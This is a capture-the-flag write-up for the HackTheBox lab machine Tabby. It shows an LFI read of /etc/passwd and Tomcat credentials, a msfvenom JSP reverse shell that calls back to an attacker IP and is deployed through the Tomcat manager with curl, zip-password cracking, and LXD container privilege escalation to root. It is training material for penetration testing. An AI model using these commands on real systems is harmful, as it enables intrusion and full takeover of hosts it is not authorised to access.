HackTheBox Tabby writeup

Tabby is an easy Linux machine from HackTheBox, that is part of the pool of machines that are recommended for preparation for OSCP certification.

Enumeration

Start with nmap scan:

nmap -sC -sV 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 06:30 EDT
Nmap scan report for 10.10.10.194
Host is up (0.021s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

---

Exploitation of Tomcat

The service that runs on port 80 is vulnerable to LFI, and that’s led to the exposure of the /etc/passwd

view-source:http://10.10.10.194/news.php?file=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash

It took a while to find the tomcat-users.xml file, as usually it’s located at usr/share/tomcat9/conf/tomcat-users.xml. In that case, you can find the tomcat-users.xml file at view-source:http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml.

Content of the file:

   <role rolename="admin-gui"/>
   <role rolename="manager-script"/>
   <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

Creating a reverse shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=53 -f war > shell.war

Port number can be any. Here I’m just trying to follow the approach What if there would be a firewall? and not using something sketchy as port 4444

Uploading the reverse shell:

curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/shell'

Starting a listener on port 53

nc -nlvp 53

Triggering the shell:

curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/shell/

Upgrading the shell to fully TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
CTRL+Z
stty raw -echo  
fg

---

Privilege escalation with LXC containers

From /etc/passwd file we know that user ash exists in the system. Enumeration PrivEsc ways with linpeas.sh can spot the file 16162020_backup.zip in /var/www/html/files/

Download it to the Kali instance and cracking with fcrackzip:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt 16162020_backup.zip

Mentioned .zip file contains credentials ash:admin@it.

Switching user with su command.

ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

What’s LXD?

LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.

Building a custom container:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine

Uploading the new file to the machine and starting exploitation:

lxc image import ./alpine-v3.12-x86_64-20200710_0823.tar.gz --alias exploit

A list of images can be checked with the command:

lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| exploit | 35186ff8d0a4 | no     | alpine v3.12 (20200710_08:23) | x86_64       | CONTAINER | 3.05MB | Jul 10, 2020 at 3:28pm (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

The container has been created. Now you can initiate this container as a privileged one and mount a disk as a device:

lxc init exploit honk -c security.privileged=true
lxc config device add honk roguedevice disk source=/ path=/mnt/root recursive=true
lxc start honk
lxc exec honk /bin/sh

As a result, you will spawn a root shell.